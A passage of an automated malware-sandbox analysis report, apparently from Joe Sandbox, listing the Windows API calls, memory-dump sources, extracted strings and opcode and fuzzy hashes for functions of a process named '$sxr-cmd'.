• GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7137E32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF7137F35C3
• AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7137E32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF7137F35D9
• GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7137E32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF7137F35ED
• ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7137E32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF7137F3602
Memory Dump Source
• Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
Similarity
• API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
• String ID:
• API String ID: 513048808-0
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000D.00000002.3356177437.000002155A5B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002155A5B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2155a5b0000_$sxr-cmd.jbxd
Similarity
• API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
• String ID:
• API String ID: 517849248-0
                                                                                                            • Opcode ID: dd2bb52e115c473e0f8e08ec62385b9b1bc9a7885310831d85afcbe291b8297d
                                                                                                            • Instruction ID: e6282a0ba8e6ae92b1a940e0ade8aa942ebc5de07dc03648e2f82894bb641107
                                                                                                            • Opcode Fuzzy Hash: dd2bb52e115c473e0f8e08ec62385b9b1bc9a7885310831d85afcbe291b8297d
                                                                                                            • Instruction Fuzzy Hash: DB015E31301E55E6FA50DB12A468B99A3A2F798FD4F844074EE4A43758DF38C589C740
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000D.00000002.3356177437.000002155A5B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002155A5B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2155a5b0000_$sxr-cmd.jbxd
Similarity
• API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
• String ID:
• API String ID: 449555515-0
• Opcode ID: 4f9aa0d141a117e5b28f836a31fda0da5fbbd9299a6c1a47c4e907238d40991d
• Instruction ID: 717e8b7054fd84cf82244cd4a899a420a65af92a63f0652a6642f53cd8cbb38f
• Opcode Fuzzy Hash: 4f9aa0d141a117e5b28f836a31fda0da5fbbd9299a6c1a47c4e907238d40991d
• Instruction Fuzzy Hash: B0115275702F68F6FF109B25F45DB9562A2B7A9B59F840464EE4917758EF3DC00C8700
Uniqueness

Uniqueness Score: -1.00%

APIs
• OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7138071F9
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF71380720D
• OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF713807300
  • Part of subcall function 00007FF713805740: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,?,?,00007FF7138075C4,?,?,00000000,00007FF713806999,?,?,?,?,?,00007FF7137F8C39), ref: 00007FF713805744
Strings
Memory Dump Source
• Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
• Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
Similarity
• API ID: OpenSemaphore$CloseErrorHandleLast
• String ID: _p0$wil
• API String ID: 455305043-1814513734
• Opcode ID: 39a27b84dfd8631c9037e55d178cc10ed73d1848b9dee361412bcbd5f2f98ace
• Instruction ID: 3965c8189e448f0732ceac253a5494fd058c615bf4303082a89af685c41ba40c
• Opcode Fuzzy Hash: 39a27b84dfd8631c9037e55d178cc10ed73d1848b9dee361412bcbd5f2f98ace
• Instruction Fuzzy Hash: 0C61A461B19E4285EFA1BB65D4101B9A3D1FF84BA4FD54431EA0E2B794DF3ED5288330
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.3356177437.000002155A5B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002155A5B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2155a5b0000_$sxr-cmd.jbxd
Similarity
• API ID: CurrentImageNonwritableUnwind__except_validate_context_record
• String ID: csm$f
• API String ID: 2395640692-629598281
• Opcode ID: e553a6fcd8766cf47cad89aa0da34990ab2b17b041ac015739fdea2a23d0852d
• Instruction ID: 47e99bcb04c5f6a857def35871862be1d1c03d96c3f04c60aba2e6e7e4c720bb
• Opcode Fuzzy Hash: e553a6fcd8766cf47cad89aa0da34990ab2b17b041ac015739fdea2a23d0852d
• Instruction Fuzzy Hash: C851AA32611A28EAEF14CF15E448F9D77A6F3A2B9DF9181A4FA1747788DB34C849C700
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
• Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
Similarity
• API ID: wcschr$Heapiswspacememset$AllocProcess
• String ID: %s
• API String ID: 2401724867-3043279178
• Opcode ID: dd1cc4c2ac35cbae555720ed0156d711a3be8397f4b57180936ab19164fc0550
• Instruction ID: 82d5271c9863b8da766b3908454b11bfba1431700e67a34503f5fb4e60ea1d8f
• Opcode Fuzzy Hash: dd1cc4c2ac35cbae555720ed0156d711a3be8397f4b57180936ab19164fc0550
• Instruction Fuzzy Hash: 2151D672A09E8285EBA0AF11D8402F9B3A0FB497A4F844135D95D6B794EF3DD45DC730
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
• Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
Similarity
• API ID: iswdigit
• String ID: GeToken: (%x) '%s'
• API String ID: 3849470556-1994581435
• Opcode ID: 916785734c28613ef95a47b0691686ece84d0169728ea5130b23609204428c36
• Instruction ID: 8c4f9ac6d78bd5d51d576143227fca552b852b359a68d745c16b6ba7cb29355a
• Opcode Fuzzy Hash: 916785734c28613ef95a47b0691686ece84d0169728ea5130b23609204428c36
• Instruction Fuzzy Hash: 06518C35A08E4285EBA0AF56A484179B7A0FB58B24F848A35DA5D73790DF7DE49CC330
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF713809A10
• RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF713809994
  • Part of subcall function 00007FF71380A73C: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF713809A82), ref: 00007FF71380A77A
  • Part of subcall function 00007FF71380A73C: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF713809A82), ref: 00007FF71380A839
  • Part of subcall function 00007FF71380A73C: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF713809A82), ref: 00007FF71380A850
• wcsrchr.MSVCRT ref: 00007FF713809A62
Strings
Memory Dump Source
• Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
• Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
Similarity
• API ID: ErrorLast$CloseEnumOpenwcsrchr
• String ID: %s=%s$.
• API String ID: 3242694432-4275322459
• Opcode ID: f0a6781f902405e6d501dc5d40a6bf5070585413eea37f1d1ba285c718ededde
• Instruction ID: 9f828556a719654dce4ec49a854334017e212da9f4261f80ed9a91dc16738279
• Opcode Fuzzy Hash: f0a6781f902405e6d501dc5d40a6bf5070585413eea37f1d1ba285c718ededde
• Instruction Fuzzy Hash: E9418221A0DB4285FB90BB11A050279D2D4BF897B0F944230DD9D3B7E5DE7DE46D8230
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7138054E6
• CreateMutexExW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF71380552E
  • Part of subcall function 00007FF71380758C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF713806999,?,?,?,?,?,00007FF7137F8C39), ref: 00007FF7138075AE
  • Part of subcall function 00007FF71380758C: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF713806999,?,?,?,?,?,00007FF7137F8C39), ref: 00007FF7138075C6
Strings
Memory Dump Source
• Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
• Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
Similarity
• API ID: ErrorLast$CreateCurrentMutexProcess
• String ID: Local\SM0:%d:%d:%hs$wil$x
• API String ID: 779401067-630742106
• Opcode ID: 455202d7a479b8eb008443c79237f92c22bbe4b1cb8e523106a0b0b2338ac627
• Instruction ID: fb4bba7d88dc5c1278b4d933a6e7b8e0a49a235375ec8501b4bf43424b337e7e
• Opcode Fuzzy Hash: 455202d7a479b8eb008443c79237f92c22bbe4b1cb8e523106a0b0b2338ac627
• Instruction Fuzzy Hash: 4151A53261CE82C5EBA1AB51E4007FAE3A0EF847A4F944031EA0D6FA55DE3ED419C730
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
• Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
Similarity
• API ID: CurrentDirectorytowupper
• String ID: :$:
• API String ID: 238703822-3780739392
• Opcode ID: dcf03791281f7c84e6b05e0af004632f1679b3806237a1a98edf480c5c28324e
• Instruction ID: 02518537f541203ebb71a2014723d44202cd06e1be108aa376e04ce1a4676126
• Opcode Fuzzy Hash: dcf03791281f7c84e6b05e0af004632f1679b3806237a1a98edf480c5c28324e
• Instruction Fuzzy Hash: E5110452608A41C6EB65AB62E844279FAE0FF4DBA9FC58132DE0D17790DF3CD04D8724
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseOpenQueryValue
                                                                                                            • String ID: Software\Microsoft\Windows NT\CurrentVersion$UBR
                                                                                                            • API String ID: 3677997916-3870813718
                                                                                                            • Opcode ID: e374f3dcbd9129e05b114749def04da8ffc7e52e41f89dc762ae3dbe31e9aca9
                                                                                                            • Instruction ID: c7705bee960f2861a60036c0f56a9d4a0685afcc5cd93d77ae50a9870982e3eb
                                                                                                            • Opcode Fuzzy Hash: e374f3dcbd9129e05b114749def04da8ffc7e52e41f89dc762ae3dbe31e9aca9
                                                                                                            • Instruction Fuzzy Hash: 52112872618A45C7EB509B14E48066AFBA0FB8A774F804231DA8D22768EF7DC05CCB20
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3356177437.000002155A5B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002155A5B0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_2155a5b0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FinalHandleNamePathlstrlen
                                                                                                            • String ID: \\?\
                                                                                                            • API String ID: 2719912262-4282027825
                                                                                                            • Opcode ID: b063e99747d40705daecabcc818f010f8e057a4149015bdb718489c079619189
                                                                                                            • Instruction ID: 290bda36b7b10363460701309e55426c61d75bf9a80d99634a073cdcaa2451b5
                                                                                                            • Opcode Fuzzy Hash: b063e99747d40705daecabcc818f010f8e057a4149015bdb718489c079619189
                                                                                                            • Instruction Fuzzy Hash: A4F03172304A55E2FF609B11F4A8BD9A762F7A4B9DFC48064EA494A558DF3CC68CC700
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3356177437.000002155A5B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002155A5B0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_2155a5b0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CombinePath
                                                                                                            • String ID: \\.\pipe\
                                                                                                            • API String ID: 3422762182-91387939
                                                                                                            • Opcode ID: 275731b5076b0e6dc254ebb2ecc66cd3e96493bb62629767b69f00e53740df4b
                                                                                                            • Instruction ID: a2839a94a2f67037f0a9a4c9a3f4fb5f392056b2d1e7b6aa687f784a955ce5c7
                                                                                                            • Opcode Fuzzy Hash: 275731b5076b0e6dc254ebb2ecc66cd3e96493bb62629767b69f00e53740df4b
                                                                                                            • Instruction Fuzzy Hash: A7F05474205F64E1FE004B53B929595E212E798FE9F849170BF5617B18DF38C4498304
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3356177437.000002155A5B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002155A5B0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_2155a5b0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                            • Opcode ID: 998d7d4103a02a9e6d60ca2871a9eec56d3e9844af320b42809f87498ae3ac58
                                                                                                            • Instruction ID: 035f9d8240e9e48b56f7e61549c56a7cb6aa49bf9d130c88b0d6fd767b453fdf
                                                                                                            • Opcode Fuzzy Hash: 998d7d4103a02a9e6d60ca2871a9eec56d3e9844af320b42809f87498ae3ac58
                                                                                                            • Instruction Fuzzy Hash: EEF05E71712F18F2FF444B60F4ACBE8A362ABE8B59F841059BA1B46168DF38C48CC700
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3356177437.000002155A5B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002155A5B0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_2155a5b0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 2882836952-0
                                                                                                            • Opcode ID: 09a1da4ea647e200bc3592a5ab7a7466c61b6a393229a681a1c2ded621564b7f
                                                                                                            • Instruction ID: 735b8791f0aa28dd1d17a8c933cf3c5d15b5ceac602a02df7245f7a8fa264978
                                                                                                            • Opcode Fuzzy Hash: 09a1da4ea647e200bc3592a5ab7a7466c61b6a393229a681a1c2ded621564b7f
                                                                                                            • Instruction Fuzzy Hash: 5502E632219B94D6EB64CB55E49479AB7A1F3D5B89F500055FA8F83BA8DF7CC448CB00
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3356177437.000002155A5B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002155A5B0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_2155a5b0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                                                                            • String ID:
                                                                                                            • API String ID: 2210144848-0
                                                                                                            • Opcode ID: 805c3f4572016d1162eba903c1866f821554d6bcbc59870d2561a84f84d0e957
                                                                                                            • Instruction ID: 0d485f4d01c76aeb24b70dc29031dfb12d38fded59e27fe02b49124eb84dbb16
                                                                                                            • Opcode Fuzzy Hash: 805c3f4572016d1162eba903c1866f821554d6bcbc59870d2561a84f84d0e957
                                                                                                            • Instruction Fuzzy Hash: 9181C532612E24F9FF50DB608868BED67A2F7E4B9CFC44155FE0A5369ADB348449CB10
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memsetwcsrchr$wcschr
                                                                                                            • String ID:
                                                                                                            • API String ID: 110935159-0
                                                                                                            • Opcode ID: 8db701cdac1b444ee30525db5161909d8125aab0fd237b8664a36cdcc15200a2
                                                                                                            • Instruction ID: 8b48a1b3ab948409af789505733e2c6b97c1fb7bf3b6c49bd0211ea61f4cf156
                                                                                                            • Opcode Fuzzy Hash: 8db701cdac1b444ee30525db5161909d8125aab0fd237b8664a36cdcc15200a2
                                                                                                            • Instruction Fuzzy Hash: FC51D522B09B8285FFA1AB5198447F9A390BF4DBB4F854230CE5D3B784DE3CE55D8220
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memset$CurrentDirectorytowupper
                                                                                                            • String ID:
                                                                                                            • API String ID: 1403193329-0
                                                                                                            • Opcode ID: b4c5736d36697416d54369b985fffd56fc1a3dd567bd398268ab3e938c2f29e4
                                                                                                            • Instruction ID: a18faea87b83e59774576c814fe9b7cc36728a4f12434e1cd8ed86d2df284dc1
                                                                                                            • Opcode Fuzzy Hash: b4c5736d36697416d54369b985fffd56fc1a3dd567bd398268ab3e938c2f29e4
                                                                                                            • Instruction Fuzzy Hash: 4B51C527A05A8586EBA4AF20D9806B9B7A4FF4C778F858135CA2D17794EF3CD54C8320
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • memset.MSVCRT ref: 00007FF7137E921C
                                                                                                            • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7137E93AA
                                                                                                              • Part of subcall function 00007FF7137E8B20: wcsrchr.MSVCRT ref: 00007FF7137E8BAB
                                                                                                              • Part of subcall function 00007FF7137E8B20: _wcsicmp.MSVCRT ref: 00007FF7137E8BD4
                                                                                                              • Part of subcall function 00007FF7137E8B20: _wcsicmp.MSVCRT ref: 00007FF7137E8BF2
                                                                                                              • Part of subcall function 00007FF7137E8B20: GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7137E8C16
                                                                                                              • Part of subcall function 00007FF7137E8B20: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7137E8C2F
                                                                                                              • Part of subcall function 00007FF7137E8B20: wcschr.MSVCRT ref: 00007FF7137E8CB3
                                                                                                              • Part of subcall function 00007FF7137F417C: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7137F41AD
                                                                                                              • Part of subcall function 00007FF7137F3060: SetErrorMode.KERNELBASE(00000000,00000000,0000000A,00007FF7137E92AC), ref: 00007FF7137F30CA
                                                                                                              • Part of subcall function 00007FF7137F3060: SetErrorMode.KERNELBASE ref: 00007FF7137F30DD
                                                                                                              • Part of subcall function 00007FF7137F3060: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7137F30F6
                                                                                                              • Part of subcall function 00007FF7137F3060: SetErrorMode.KERNELBASE ref: 00007FF7137F3106
                                                                                                            • wcsrchr.MSVCRT ref: 00007FF7137E92D8
                                                                                                            • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7137E9362
                                                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7137E9373
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
• Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
